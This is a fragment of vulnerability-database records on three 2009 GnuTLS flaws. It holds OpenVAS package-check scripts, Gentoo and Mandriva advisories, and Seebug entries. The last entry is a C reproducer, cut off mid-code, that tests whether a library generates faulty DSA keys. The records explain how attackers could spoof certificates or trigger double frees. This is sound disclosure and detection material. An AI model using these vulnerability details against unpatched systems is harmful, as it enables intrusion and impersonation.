"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-128-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:63965", "href": "http://plugins.openvas.org/nasl.php?oid=63965", "type": "openvas", "title": "Slackware Advisory SSA:2009-128-01 gnutls", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_128_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New gnutls packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-128-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-128-01\";\n \nif(description)\n{\n script_id(63965);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2009-128-01 gnutls \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"gnutls\", ver:\"2.6.2-i486-2_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnutls\", ver:\"2.6.2-i486-2_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"gnutls\", ver:\"2.6.2-i486-2_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2730", "CVE-2009-1417"], "description": "The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:308.", "modified": "2017-07-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66371", "href": "http://plugins.openvas.org/nasl.php?oid=66371", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:308 (gnutls)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_308.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:308 (gnutls)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in gnutls:\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation\nand expiration times of X.509 certificates, which allows remote\nattackers to successfully present a certificate that is (1) not yet\nvalid or (2) no longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nA vulnerability have been discovered and corrected in GnuTLS\nbefore 2.8.2, which could allow man-in-the-middle attackers to spoof\narbitrary SSL servers via a crafted certificate issued by a legitimate\nCertification Authority (CVE-2009-2730).\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update fixes this vulnerability.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:308\";\ntag_summary = \"The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:308.\";\n\n \n\nif(description)\n{\n script_id(66371);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1417\", \"CVE-2009-2730\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:308 (gnutls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls13\", rpm:\"libgnutls13~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls13\", rpm:\"lib64gnutls13~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2730", "CVE-2009-1417"], "description": "The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:308.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066371", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066371", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:308 (gnutls)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_308.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:308 (gnutls)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in gnutls:\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation\nand expiration times of X.509 certificates, which allows remote\nattackers to successfully present a certificate that is (1) not yet\nvalid or (2) no longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nA vulnerability have been discovered and corrected in GnuTLS\nbefore 2.8.2, which could allow man-in-the-middle attackers to spoof\narbitrary SSL servers via a crafted certificate issued by a legitimate\nCertification Authority (CVE-2009-2730).\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update fixes this vulnerability.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:308\";\ntag_summary = \"The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:308.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66371\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1417\", \"CVE-2009-2730\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:308 (gnutls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls13\", rpm:\"libgnutls13~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls13\", rpm:\"lib64gnutls13~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.0.0~2.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:00", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "### Background\n\nGnuTLS is an Open Source implementation of the TLS 1.0 and SSL 3.0 protocols. \n\n### Description\n\nThe following vulnerabilities were found in GnuTLS: \n\n * Miroslav Kratochvil reported that lib/pk-libgcrypt.c does not properly handle corrupt DSA signatures, possibly leading to a double-free vulnerability (CVE-2009-1415).\n * Simon Josefsson reported that GnuTLS generates RSA keys stored in DSA structures when creating a DSA key (CVE-2009-1416).\n * Romain Francoise reported that the _gnutls_x509_verify_certificate() function in lib/x509/verify.c does not perform time checks, resulting in the \"gnutls-cli\" program accepting X.509 certificates with validity times in the past or future (CVE-2009-1417).\n\n### Impact\n\nA remote attacker could entice a user or automated system to process a specially crafted DSA certificate, possibly resulting in a Denial of Service condition. NOTE: This issue might have other unspecified impact including the execution of arbitrary code. Furthermore, a remote attacker could spoof signatures on certificates and the \"gnutls-cli\" application can be tricked into accepting an invalid certificate. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll GnuTLS users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/gnutls-2.6.6\"", "edition": 1, "modified": "2009-05-24T00:00:00", "published": "2009-05-24T00:00:00", "id": "GLSA-200905-04", "href": "https://security.gentoo.org/glsa/200905-04", "type": "gentoo", "title": "GnuTLS: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "DoS, certificate validation vulnerabilities.", "edition": 1, "modified": "2009-05-19T00:00:00", "published": "2009-05-19T00:00:00", "id": "SECURITYVULNS:VULN:9913", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9913", "title": "gnutls multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:116\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : gnutls\r\n Date : May 18, 2009\r\n Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in gnutls:\r\n \r\n lib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\r\n properly handle invalid DSA signatures, which allows remote attackers\r\n to cause a denial of service (application crash) and possibly have\r\n unspecified other impact via a malformed DSA key that triggers a (1)\r\n free of an uninitialized pointer or (2) double free (CVE-2009-1415).\r\n \r\n lib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\r\n RSA keys stored in DSA structures, instead of the intended DSA keys,\r\n which might allow remote attackers to spoof signatures on certificates\r\n or have unspecified other impact by leveraging an invalid DSA key\r\n (CVE-2009-1416).\r\n \r\n gnutls-cli in GnuTLS before 2.6.6 does not verify the activation\r\n and expiration times of X.509 certificates, which allows remote\r\n attackers to successfully present a certificate that is (1) not yet\r\n valid or (2) no longer valid, related to lack of time checks in the\r\n _gnutls_x509_verify_certificate function in lib/x509/verify.c in\r\n libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\r\n (CVE-2009-1417).\r\n \r\n The updated packages have been patched to prevent this.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1416\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1417\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.1:\r\n 6d7ecb7d91ba28868368b87e8053aea7 2008.1/i586/gnutls-2.3.0-2.5mdv2008.1.i586.rpm\r\n 96b8911ca78bf3e5fc613c712ff981d8 2008.1/i586/libgnutls26-2.3.0-2.5mdv2008.1.i586.rpm\r\n d6a02014de6dc2a0c15a2760e137bb51 2008.1/i586/libgnutls-devel-2.3.0-2.5mdv2008.1.i586.rpm \r\n 3fb2fe697587a4207059124a71ff44a1 2008.1/SRPMS/gnutls-2.3.0-2.5mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2008.1/X86_64:\r\n b2a99ca654a7c67bfdc77c8c13d748d9 2008.1/x86_64/gnutls-2.3.0-2.5mdv2008.1.x86_64.rpm\r\n ecd43a69e956d43346c45450c7fc9051 2008.1/x86_64/lib64gnutls26-2.3.0-2.5mdv2008.1.x86_64.rpm\r\n 4347df4cc5403f6a427d9cd1e52080ea 2008.1/x86_64/lib64gnutls-devel-2.3.0-2.5mdv2008.1.x86_64.rpm \r\n 3fb2fe697587a4207059124a71ff44a1 2008.1/SRPMS/gnutls-2.3.0-2.5mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n c28c925bd7f0269611ac9c6dd392df28 2009.0/i586/gnutls-2.4.1-2.4mdv2009.0.i586.rpm\r\n 7a41677834cb818e4e8423fa2360e5e8 2009.0/i586/libgnutls26-2.4.1-2.4mdv2009.0.i586.rpm\r\n d47da33eac7b6477f2690c153d2e4408 2009.0/i586/libgnutls-devel-2.4.1-2.4mdv2009.0.i586.rpm \r\n dc2307362de50d642550c68a952e69aa 2009.0/SRPMS/gnutls-2.4.1-2.4mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 50eb92f492ac913e11223cf407df5cd4 2009.0/x86_64/gnutls-2.4.1-2.4mdv2009.0.x86_64.rpm\r\n e365c536596584def2d8b61ab4ad63a9 2009.0/x86_64/lib64gnutls26-2.4.1-2.4mdv2009.0.x86_64.rpm\r\n 13d3880ff941cf06ea4fedeed9ed927b 2009.0/x86_64/lib64gnutls-devel-2.4.1-2.4mdv2009.0.x86_64.rpm \r\n dc2307362de50d642550c68a952e69aa 2009.0/SRPMS/gnutls-2.4.1-2.4mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n bc07281e83debdbb5e652d0b84899c47 2009.1/i586/gnutls-2.6.4-1.2mdv2009.1.i586.rpm\r\n 89a97dd8d4cd8b717eacffdcf6d1fe59 2009.1/i586/libgnutls26-2.6.4-1.2mdv2009.1.i586.rpm\r\n cbaed84e3b4d9787c4c230b6fa44b7cc 2009.1/i586/libgnutls-devel-2.6.4-1.2mdv2009.1.i586.rpm \r\n 96fc806f2ac7db65af86ca7c6513d0f4 2009.1/SRPMS/gnutls-2.6.4-1.2mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n c785b4b48f78089add92553b67ecf7a5 2009.1/x86_64/gnutls-2.6.4-1.2mdv2009.1.x86_64.rpm\r\n 5c68d534e8741114dfbb9ddd937badf7 2009.1/x86_64/lib64gnutls26-2.6.4-1.2mdv2009.1.x86_64.rpm\r\n d21fab6a3225a1333b757707bbfa7be9 2009.1/x86_64/lib64gnutls-devel-2.6.4-1.2mdv2009.1.x86_64.rpm \r\n 96fc806f2ac7db65af86ca7c6513d0f4 2009.1/SRPMS/gnutls-2.6.4-1.2mdv2009.1.src.rpm\r\n\r\n Corporate 4.0:\r\n 72433f7e4e0952eabf5838e7de56f9cb corporate/4.0/i586/gnutls-1.0.25-2.4.20060mlcs4.i586.rpm\r\n 7a3ba08830a820772bb2ffdda5bd9304 corporate/4.0/i586/libgnutls11-1.0.25-2.4.20060mlcs4.i586.rpm\r\n cb04b2511750d20901be98da67a287c9 \r\ncorporate/4.0/i586/libgnutls11-devel-1.0.25-2.4.20060mlcs4.i586.rpm \r\n 2c5ddb3d77debdb4eb619896d264ef36 corporate/4.0/SRPMS/gnutls-1.0.25-2.4.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 84d3e0ac9c3b992b4d7dadd3f4a83f4f corporate/4.0/x86_64/gnutls-1.0.25-2.4.20060mlcs4.x86_64.rpm\r\n 4e97802d216f69842e6a373aa5d83aeb \r\ncorporate/4.0/x86_64/lib64gnutls11-1.0.25-2.4.20060mlcs4.x86_64.rpm\r\n 8af535b1023b577afbe122344fad21be \r\ncorporate/4.0/x86_64/lib64gnutls11-devel-1.0.25-2.4.20060mlcs4.x86_64.rpm \r\n 2c5ddb3d77debdb4eb619896d264ef36 corporate/4.0/SRPMS/gnutls-1.0.25-2.4.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFKEU9PmqjQ0CJFipgRAqReAKD1n+ojNrGr4Ma04VzXwbqh6OzDYQCg0IfH\r\n8SmPTI0PYNZR4Y+HFkaLlrU=\r\n=g2Fs\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2009-05-19T00:00:00", "published": "2009-05-19T00:00:00", "id": "SECURITYVULNS:DOC:21839", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21839", "title": "[Full-disclosure] [ MDVSA-2009:116 ] gnutls", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:52:49", "description": "BUGTRAQ ID: 34783\r\nCVE(CAN) ID: CVE-2009-1416,CVE-2009-1415,CVE-2009-1417\r\n\r\nGnuTLS\u662f\u7528\u4e8e\u5b9e\u73b0TLS\u52a0\u5bc6\u534f\u8bae\u7684\u51fd\u6570\u5e93\u3002\r\n\r\nGnuTLS\u4e2d\u7684\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u88ab\u8fdc\u7a0b\u5229\u7528\u6267\u884c\u6b3a\u9a97\u653b\u51fb\u3001\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u6216\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\n1) \u5904\u7406\u65e0\u6548DSA\u5bc6\u94a5\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u91ca\u653e\u65e0\u6548\u5185\u5b58\uff0c\u5ba2\u6237\u7aef\u5e94\u7528\u53ef\u80fd\u4f1a\u5d29\u6e83\u3002\r\n\r\n2) GnuTLS\u5e93\u751f\u6210\u7684\u662fRSA\u5bc6\u94a5\u800c\u4e0d\u662fDSA\u5bc6\u94a5\uff0c\u800cRSA\u5bc6\u94a5\u751f\u6210\u7684\u662f\u5f31\u52a0\u5bc6\u7b7e\u540d\u3002\r\n\r\n3) gnutls-cli\u5e94\u7528\u6ca1\u6709\u6b63\u786e\u5730\u68c0\u67e5X.509\u8bc1\u4e66\u7684\u6fc0\u6d3b\u548c\u8fc7\u671f\u65e5\u671f\uff0c\u53ef\u80fd\u8bf1\u9a97\u5e94\u7528\u7a0b\u5e8f\u63a5\u53d7\u65e0\u6548\u7684\u8bc1\u4e66\u3002\n0\nGNU GnuTLS < 2.6.6\nGNU\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=ftp://ftp.gnu.org/pub/gnu/gnutls/gnutls-2.6.6.tar.bz2 target=_blank rel=external nofollow>ftp://ftp.gnu.org/pub/gnu/gnutls/gnutls-2.6.6.tar.bz2</a>", "published": "2009-05-04T00:00:00", "title": "GnuTLS\u5e93\u591a\u4e2a\u8fdc\u7a0b\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "modified": "2009-05-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11185", "id": "SSV:11185", "sourceData": "\n http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3515\r\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3516\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-11185"}, {"lastseen": "2017-11-19T16:44:49", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1416"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86226", "id": "SSV:86226", "sourceData": "\n source: http://www.securityfocus.com/bid/34783/info\r\n \r\nGnuTLS is prone to multiple remote vulnerabilities:\r\n \r\n- A remote code-execution vulnerability\r\n- A denial-of-service vulnerability\r\n- A signature-generation vulnerability\r\n- A signature-verification vulnerability\r\n \r\nAn attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.\r\n \r\nVersions prior to GnuTLS 2.6.6 are vulnerable.\r\n\r\n/*\r\n * Small code to reproduce the CVE-2009-1416 bad DSA key problem.\r\n *\r\n * Build it using:\r\n *\r\n * gcc -o cve-2009-1416 cve-2009-1416.c -lgnutls\r\n *\r\n * If your gnutls library is OK then running it will print 'success!'.\r\n *\r\n * If your gnutls library is buggy then running it will print 'buggy'.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <stdlib.h>\r\n\r\n#include <gcrypt.h>\r\n#include <gnutls/gnutls.h>\r\n\r\nint\r\nmain (void)\r\n{\r\n gnutls_x509_privkey_t key;\r\n gnutls_datum_t p, q, g, y, x;\r\n int ret;\r\n\r\n gnutls_global_init ();\r\n gcry_control (GCRYCTL_ENABLE_QUICK_RANDOM, 0);\r\n\r\n ret = gnutls_x509_privkey_init (&key);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_privkey_generate (key, GNUTLS_PK_DSA, 512, 0);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_privkey_export_dsa_raw (key, &p, &q, &g, &y, &x);\r\n if (ret < 0)\r\n return 1;\r\n\r\n if (q.size == 3 